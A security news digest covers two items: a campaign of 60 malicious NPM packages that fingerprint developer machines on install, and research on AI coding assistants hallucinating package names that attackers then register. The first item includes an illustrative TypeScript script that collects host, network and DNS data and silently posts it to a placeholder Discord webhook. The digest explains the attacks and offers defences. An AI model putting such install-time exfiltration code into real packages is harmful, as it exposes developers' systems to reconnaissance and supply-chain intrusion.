Security firm Socket discovered an active campaign targeting developers through 60 malicious NPM packages that steal system data when installed. Over two weeks, threat actors published packages containing scripts that collect hostnames, IP addresses, DNS servers, and directory paths, sending everything to a Discord webhook.
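For illustration, here is a minimal sketch of how an install-time script can harvest this kind of data in Node.js. This is not the campaign's actual code; the webhook URL is a placeholder, and a real package would wire the script into a `postinstall` hook so it runs automatically during `npm install`.

```typescript
// Illustrative sketch of install-time fingerprinting (not the real malware).
import os from "node:os";
import dns from "node:dns";

// Placeholder; a real campaign hard-codes an attacker-controlled webhook.
const WEBHOOK_URL = "https://discord.com/api/webhooks/<id>/<token>";

const fingerprint = {
  hostname: os.hostname(),            // machine name
  interfaces: os.networkInterfaces(), // local IP addresses
  dnsServers: dns.getServers(),       // configured DNS resolvers
  installPath: process.cwd(),         // directory the package landed in
  platform: os.platform(),            // win32 / linux / darwin
};

// Exfiltrate everything in one POST (global fetch, Node 18+); errors are
// swallowed so the install appears to succeed normally.
fetch(WEBHOOK_URL, {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ content: JSON.stringify(fingerprint) }),
}).catch(() => {});
```

One practical defense is installing with `npm install --ignore-scripts` (or setting `ignore-scripts=true` in `.npmrc`), which stops lifecycle hooks like `postinstall` from running at all, though it also breaks packages that legitimately depend on them.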
The packages have been downloaded over 3,000 times across Windows, Linux, and macOS systems. Three NPM accounts published 20 packages each, all carrying identical fingerprinting code that checks for sandbox and analysis environments to evade detection.
Socket warns this data helps attackers map internal developer networks to public infrastructure, enabling future supply chain attacks and targeted intrusions.
Source: Security Week
Researchers from three US universities discovered that AI coding assistants frequently recommend software packages that don't exist, a problem they've dubbed "slopsquatting." Hackers can exploit these hallucinations by registering malicious packages under the invented names, tricking developers into downloading compromised code.
The study tested 16 popular AI models and found none were immune. Commercial models hallucinated package names 5.2% of the time on average, while open-source models hit 21.7%. Of 2.23 million package references the models generated, nearly 20% pointed to packages that don't exist.
This opens a dangerous supply chain attack vector: a single poisoned dependency could infect entire software projects. The researchers suggest better prompt engineering and model training to address the issue.
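Independent of the researchers' suggestions, one lightweight guard on the developer side is to confirm that an AI-suggested package actually resolves on the public npm registry before installing it. A minimal sketch follows; the `checkPackageExists` helper name is hypothetical, and the only API behavior assumed is that the registry returns a 404 for unknown names.

```typescript
// Screen AI-suggested dependency names against the npm registry
// before running `npm install` (illustrative sketch).
async function checkPackageExists(name: string): Promise<boolean> {
  // registry.npmjs.org serves metadata for known packages and 404 otherwise.
  const res = await fetch(`https://registry.npmjs.org/${encodeURIComponent(name)}`);
  return res.ok;
}

const suggestions = ["express", "some-hallucinated-pkg-name"];
for (const pkg of suggestions) {
  const exists = await checkPackageExists(pkg);
  console.log(`${pkg}: ${exists ? "found on registry" : "not found, possible hallucination"}`);
}
```

Note the limit of this check: if a slopsquatter has already registered the hallucinated name, the package exists and the check passes, so it only filters out names nobody has claimed yet.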
Source: Security Week